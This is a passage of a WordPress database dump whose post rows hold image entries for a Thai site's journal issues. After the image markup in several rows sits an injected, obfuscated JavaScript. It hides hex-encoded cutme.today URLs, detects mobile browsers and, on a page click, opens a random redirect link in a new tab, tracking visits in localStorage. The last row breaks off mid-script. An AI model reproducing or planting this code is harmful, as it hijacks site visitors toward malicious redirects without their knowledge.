(378,1,'2024-08-01 20:27:41','2024-08-01 13:27:41','<!-- wp:image {\"id\":377,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/3-67-725x1024.png\" alt=\"\" class=\"wp-image-377\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสาร3-67','','inherit','closed','closed','','376-revision-v1','','','2024-08-01 20:27:41','2024-08-01 13:27:41','',376,'http://pakhaeng.ssk.in.th/?p=378',0,'revision','',0),
(379,1,'2024-08-01 20:30:19','2024-08-01 13:30:19','<!-- wp:image {\"id\":380,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-724x1024.png\" alt=\"\" class=\"wp-image-380\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสาร31-67','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a331-67','','','2024-08-01 20:30:20','2024-08-01 13:30:20','',0,'http://pakhaeng.ssk.in.th/?p=379',0,'post','',0),
(380,1,'2024-08-01 20:30:04','2024-08-01 13:30:04','','1','','inherit','','closed','','1','','','2024-08-01 20:30:04','2024-08-01 13:30:04','',379,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1.png',0,'attachment','image/png',0),
(381,1,'2024-08-01 20:30:19','2024-08-01 13:30:19','<!-- wp:image {\"id\":380,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/1-724x1024.png\" alt=\"\" class=\"wp-image-380\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( 